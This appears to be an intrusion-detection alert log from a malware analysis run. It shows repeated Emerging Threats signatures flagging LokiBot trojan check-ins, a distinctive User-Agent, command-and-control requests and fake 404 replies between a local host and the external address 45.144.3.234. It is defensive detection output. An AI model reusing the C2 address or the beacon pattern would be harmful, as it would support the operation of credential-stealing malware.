                                            12/02/20-11:53:02.371231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.371231TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.371231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.645.144.3.234
                                            12/02/20-11:53:02.505199TCP2025483ET TROJAN LokiBot Fake 404 Response804976145.144.3.234192.168.2.6
                                            12/02/20-11:53:02.962532TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.645.144.3.234
                                            12/02/20-11:53:02.962532TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.645.144.3.234
                                            12/02/20-11:53:03.089902TCP2025483ET TROJAN LokiBot Fake 404 Response804976245.144.3.234192.168.2.6
                                            12/02/20-11:53:03.392820TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.392820TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.645.144.3.234
                                            12/02/20-11:53:03.522391TCP2025483ET TROJAN LokiBot Fake 404 Response804976345.144.3.234192.168.2.6
                                            12/02/20-11:53:04.207113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.207113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.645.144.3.234
                                            12/02/20-11:53:04.333814TCP2025483ET TROJAN LokiBot Fake 404 Response804976445.144.3.234192.168.2.6
                                            12/02/20-11:53:05.339664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.339664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.645.144.3.234
                                            12/02/20-11:53:05.464609TCP2025483ET TROJAN LokiBot Fake 404 Response804976545.144.3.234192.168.2.6
                                            12/02/20-11:53:05.740205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.740205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.645.144.3.234
                                            12/02/20-11:53:05.865657TCP2025483ET TROJAN LokiBot Fake 404 Response804976645.144.3.234192.168.2.6
                                            12/02/20-11:53:06.108569TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.108569TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.645.144.3.234
                                            12/02/20-11:53:06.249782TCP2025483ET TROJAN LokiBot Fake 404 Response804976745.144.3.234192.168.2.6
                                            12/02/20-11:53:06.554063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.554063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.645.144.3.234
                                            12/02/20-11:53:06.678923TCP2025483ET TROJAN LokiBot Fake 404 Response804976845.144.3.234192.168.2.6
                                            12/02/20-11:53:06.984148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.645.144.3.234
                                            12/02/20-11:53:06.984148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.645.144.3.234
                                            12/02/20-11:53:07.107874TCP2025483ET TROJAN LokiBot Fake 404 Response804976945.144.3.234192.168.2.6
                                            12/02/20-11:53:07.369521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.369521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.645.144.3.234
                                            12/02/20-11:53:07.495951TCP2025483ET TROJAN LokiBot Fake 404 Response804977045.144.3.234192.168.2.6
                                            12/02/20-11:53:07.847165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.847165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.645.144.3.234
                                            12/02/20-11:53:07.981039TCP2025483ET TROJAN LokiBot Fake 404 Response804977145.144.3.234192.168.2.6
                                            12/02/20-11:53:10.181925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.181925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.645.144.3.234
                                            12/02/20-11:53:10.313579TCP2025483ET TROJAN LokiBot Fake 404 Response804977245.144.3.234192.168.2.6
                                            12/02/20-11:53:10.569444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.569444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.645.144.3.234
                                            12/02/20-11:53:10.708133TCP2025483ET TROJAN LokiBot Fake 404 Response804977345.144.3.234192.168.2.6
                                            12/02/20-11:53:11.023775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.023775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.645.144.3.234
                                            12/02/20-11:53:11.152570TCP2025483ET TROJAN LokiBot Fake 404 Response804977445.144.3.234192.168.2.6
                                            12/02/20-11:53:11.449891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.449891TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.645.144.3.234
                                            12/02/20-11:53:11.577105TCP2025483ET TROJAN LokiBot Fake 404 Response804977545.144.3.234192.168.2.6
                                            12/02/20-11:53:11.948579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.645.144.3.234
                                            12/02/20-11:53:11.948579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.645.144.3.234
                                            12/02/20-11:53:12.076914TCP2025483ET TROJAN LokiBot Fake 404 Response804977645.144.3.234192.168.2.6
                                            12/02/20-11:53:12.388055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.388055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.645.144.3.234
                                            12/02/20-11:53:12.513310TCP2025483ET TROJAN LokiBot Fake 404 Response804977845.144.3.234192.168.2.6
                                            12/02/20-11:53:12.790593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.790593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.645.144.3.234
                                            12/02/20-11:53:12.934709TCP2025483ET TROJAN LokiBot Fake 404 Response804977945.144.3.234192.168.2.6
                                            12/02/20-11:53:13.252513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.252513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.645.144.3.234
                                            12/02/20-11:53:13.381217TCP2025483ET TROJAN LokiBot Fake 404 Response804978145.144.3.234192.168.2.6
                                            12/02/20-11:53:13.692641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.692641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.645.144.3.234
                                            12/02/20-11:53:13.819814TCP2025483ET TROJAN LokiBot Fake 404 Response804978345.144.3.234192.168.2.6
                                            12/02/20-11:53:14.113855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.113855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.645.144.3.234
                                            12/02/20-11:53:14.244583TCP2025483ET TROJAN LokiBot Fake 404 Response804978745.144.3.234192.168.2.6
                                            12/02/20-11:53:14.503418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.503418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.645.144.3.234
                                            12/02/20-11:53:14.657266TCP2025483ET TROJAN LokiBot Fake 404 Response804978945.144.3.234192.168.2.6
                                            12/02/20-11:53:14.917886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.645.144.3.234
                                            12/02/20-11:53:14.917886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979180192.168.2.645.144.3.234
                                            12/02/20-11:53:15.077527TCP2025483ET TROJAN LokiBot Fake 404 Response804979145.144.3.234192.168.2.6
                                            12/02/20-11:53:15.377622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.377622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.645.144.3.234
                                            12/02/20-11:53:15.504592TCP2025483ET TROJAN LokiBot Fake 404 Response804979345.144.3.234192.168.2.6
                                            12/02/20-11:53:15.761208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.761208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.645.144.3.234
                                            12/02/20-11:53:15.888013TCP2025483ET TROJAN LokiBot Fake 404 Response804979545.144.3.234192.168.2.6
                                            12/02/20-11:53:16.124828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.124828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.645.144.3.234
                                            12/02/20-11:53:16.253380TCP2025483ET TROJAN LokiBot Fake 404 Response804979745.144.3.234192.168.2.6
                                            12/02/20-11:53:16.497788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.497788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.645.144.3.234
                                            12/02/20-11:53:16.625171TCP2025483ET TROJAN LokiBot Fake 404 Response804979945.144.3.234192.168.2.6
                                            12/02/20-11:53:16.866136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.866136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.645.144.3.234
                                            12/02/20-11:53:16.992594TCP2025483ET TROJAN LokiBot Fake 404 Response804980045.144.3.234192.168.2.6
                                            12/02/20-11:53:17.243862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.243862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.645.144.3.234
                                            12/02/20-11:53:17.372366TCP2025483ET TROJAN LokiBot Fake 404 Response804980245.144.3.234192.168.2.6
                                            12/02/20-11:53:17.613940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.645.144.3.234
                                            12/02/20-11:53:17.613940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.645.144.3.234
                                            12/02/20-11:53:17.613940TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.645.144.3.234
                                            12/02/20-11:53:17.613940TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.645.144.3.234
                                            12/02/20-11:53:17.740863TCP2025483ET TROJAN LokiBot Fake 404 Response804980445.144.3.234192.168.2.6
                                            12/02/20-11:53:18.048964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.645.144.3.234
                                            12/02/20-11:53:18.048964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.645.144.3.234
                                            12/02/20-11:53:18.048964TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.645.144.3.234
                                            12/02/20-11:53:18.048964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.645.144.3.234
                                            12/02/20-11:53:18.175754TCP2025483ET TROJAN LokiBot Fake 404 Response804980545.144.3.234192.168.2.6
                                            12/02/20-11:53:18.420410TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.645.144.3.234
                                            12/02/20-11:53:18.420410TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.645.144.3.234
                                            12/02/20-11:53:18.420410TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.645.144.3.234
                                            12/02/20-11:53:18.420410TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.645.144.3.234
                                            12/02/20-11:53:18.551269TCP2025483ET TROJAN LokiBot Fake 404 Response804980645.144.3.234192.168.2.6
                                            12/02/20-11:53:18.793375TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.645.144.3.234
                                            12/02/20-11:53:18.793375TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.645.144.3.234
                                            12/02/20-11:53:18.793375TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.645.144.3.234
                                            12/02/20-11:53:18.793375TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.645.144.3.234
                                            12/02/20-11:53:18.923599TCP2025483ET TROJAN LokiBot Fake 404 Response804980745.144.3.234192.168.2.6
                                            12/02/20-11:53:19.339300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.645.144.3.234
                                            12/02/20-11:53:19.339300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.645.144.3.234
                                            12/02/20-11:53:19.339300TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.645.144.3.234
                                            12/02/20-11:53:19.339300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.645.144.3.234
                                            12/02/20-11:53:19.473930TCP2025483ET TROJAN LokiBot Fake 404 Response804980945.144.3.234192.168.2.6
                                            12/02/20-11:53:19.713181TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.645.144.3.234
                                            12/02/20-11:53:19.713181TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.645.144.3.234
                                            12/02/20-11:53:19.713181TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.645.144.3.234
                                            12/02/20-11:53:19.713181TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.645.144.3.234
                                            12/02/20-11:53:19.844413TCP2025483ET TROJAN LokiBot Fake 404 Response804981045.144.3.234192.168.2.6
                                            12/02/20-11:53:20.223713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.645.144.3.234
                                            12/02/20-11:53:20.223713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.645.144.3.234
                                            12/02/20-11:53:20.223713TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.645.144.3.234
                                            12/02/20-11:53:20.223713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.645.144.3.234
                                            12/02/20-11:53:20.352597TCP2025483ET TROJAN LokiBot Fake 404 Response804981245.144.3.234192.168.2.6
                                            12/02/20-11:53:20.813500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.645.144.3.234
                                            12/02/20-11:53:20.813500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.645.144.3.234
                                            12/02/20-11:53:20.813500TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.645.144.3.234
                                            12/02/20-11:53:20.813500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.645.144.3.234
                                            12/02/20-11:53:20.939320TCP2025483ET TROJAN LokiBot Fake 404 Response804981445.144.3.234192.168.2.6
                                            12/02/20-11:53:21.264205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.645.144.3.234
                                            12/02/20-11:53:21.264205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.645.144.3.234
                                            12/02/20-11:53:21.264205TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.645.144.3.234
                                            12/02/20-11:53:21.264205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.645.144.3.234
                                            12/02/20-11:53:21.393950TCP2025483ET TROJAN LokiBot Fake 404 Response804981545.144.3.234192.168.2.6
                                            12/02/20-11:53:22.027796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.645.144.3.234
                                            12/02/20-11:53:22.027796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.645.144.3.234
                                            12/02/20-11:53:22.027796TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.645.144.3.234
                                            12/02/20-11:53:22.027796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.645.144.3.234
                                            12/02/20-11:53:22.162085TCP2025483ET TROJAN LokiBot Fake 404 Response804981745.144.3.234192.168.2.6
                                            12/02/20-11:53:23.193450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.645.144.3.234
                                            12/02/20-11:53:23.193450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.645.144.3.234
                                            12/02/20-11:53:23.193450TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.645.144.3.234
                                            12/02/20-11:53:23.193450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.645.144.3.234
                                            12/02/20-11:53:23.321213TCP2025483ET TROJAN LokiBot Fake 404 Response804981845.144.3.234192.168.2.6
                                            12/02/20-11:53:23.601425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.645.144.3.234
                                            12/02/20-11:53:23.601425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.645.144.3.234
                                            12/02/20-11:53:23.601425TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.645.144.3.234
                                            12/02/20-11:53:23.601425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.645.144.3.234
                                            12/02/20-11:53:23.731802TCP2025483ET TROJAN LokiBot Fake 404 Response804982045.144.3.234192.168.2.6
                                            12/02/20-11:53:23.968586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.645.144.3.234
                                            12/02/20-11:53:23.968586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.645.144.3.234
                                            12/02/20-11:53:23.968586TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.645.144.3.234
                                            12/02/20-11:53:23.968586TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.645.144.3.234
                                            12/02/20-11:53:24.096741TCP2025483ET TROJAN LokiBot Fake 404 Response804982145.144.3.234192.168.2.6
                                            12/02/20-11:53:24.405829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.645.144.3.234
                                            12/02/20-11:53:24.405829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.645.144.3.234
                                            12/02/20-11:53:24.405829TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.645.144.3.234
                                            12/02/20-11:53:24.405829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.645.144.3.234
                                            12/02/20-11:53:24.532400TCP2025483ET TROJAN LokiBot Fake 404 Response804982245.144.3.234192.168.2.6
                                            12/02/20-11:53:24.836771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.645.144.3.234
                                            12/02/20-11:53:24.836771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.645.144.3.234
                                            12/02/20-11:53:24.836771TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.645.144.3.234
                                            12/02/20-11:53:24.836771TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.645.144.3.234
                                            12/02/20-11:53:24.964977TCP2025483ET TROJAN LokiBot Fake 404 Response804982445.144.3.234192.168.2.6
                                            12/02/20-11:53:25.252018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.645.144.3.234
                                            12/02/20-11:53:25.252018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.645.144.3.234
                                            12/02/20-11:53:25.252018TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.645.144.3.234
                                            12/02/20-11:53:25.252018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.645.144.3.234
                                            12/02/20-11:53:25.382786TCP2025483ET TROJAN LokiBot Fake 404 Response804982545.144.3.234192.168.2.6
                                            12/02/20-11:53:25.628464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.645.144.3.234
                                            12/02/20-11:53:25.628464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.645.144.3.234
                                            12/02/20-11:53:25.628464TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.645.144.3.234
                                            12/02/20-11:53:25.628464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.645.144.3.234
                                            12/02/20-11:53:25.760842TCP2025483ET TROJAN LokiBot Fake 404 Response804982645.144.3.234192.168.2.6
                                            12/02/20-11:53:26.033210TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.645.144.3.234
                                            12/02/20-11:53:26.033210TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.645.144.3.234
                                            12/02/20-11:53:26.033210TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.645.144.3.234
                                            12/02/20-11:53:26.033210TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.2.645.144.3.234
                                            12/02/20-11:53:26.161588TCP2025483ET TROJAN LokiBot Fake 404 Response804982845.144.3.234192.168.2.6
                                            12/02/20-11:53:26.444756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.645.144.3.234
                                            12/02/20-11:53:26.444756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.645.144.3.234
                                            12/02/20-11:53:26.444756TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.645.144.3.234
                                            12/02/20-11:53:26.444756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.645.144.3.234
                                            12/02/20-11:53:26.583801TCP2025483ET TROJAN LokiBot Fake 404 Response804982945.144.3.234192.168.2.6
